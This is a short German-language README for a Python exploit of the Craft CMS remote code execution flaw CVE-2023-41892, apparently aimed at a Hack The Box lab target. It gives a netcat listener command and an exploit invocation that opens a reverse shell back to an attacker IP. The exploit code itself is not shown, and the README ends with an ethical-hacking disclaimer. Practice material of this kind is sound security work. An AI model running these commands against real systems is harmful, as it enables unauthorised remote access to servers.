
CVE-2023-41892 Reverse Shell
Dieses Python-Skript nutzt die Remote-Code-Execution-Sicherheitslücke (CVE-2023-41892) von Craft CMS aus, einem beliebten Content-Management-System. Von dieser Sicherheitslücke, die es Angreifern ermöglicht, aus der Ferne beliebigen Code auszuführen – etwa eine PHP-Reverse-Shell –, sind Versionen zwischen 4.0.0-RC1 und 4.4.14 betroffen.
Starte zuerst einen Netcat-Listener in einer anderen Shell:
nc -nlvp 1234
Überprüfe dann deine IP-Adresse und führe den Exploit aus:
python3 exploit.py -r 10.10.16.47 -p 1234 http://surveillance.htb
Viel Spaß beim Hacken mit deiner brandneuen Reverse-Shell!
Dieser Code ist ausschließlich für ethische Hacking-Zwecke gedacht und sollte nicht für böswillige Aktivitäten verwendet werden!
Dank an to016 für den ursprünglichen Code, der in diesem Gist zu finden ist.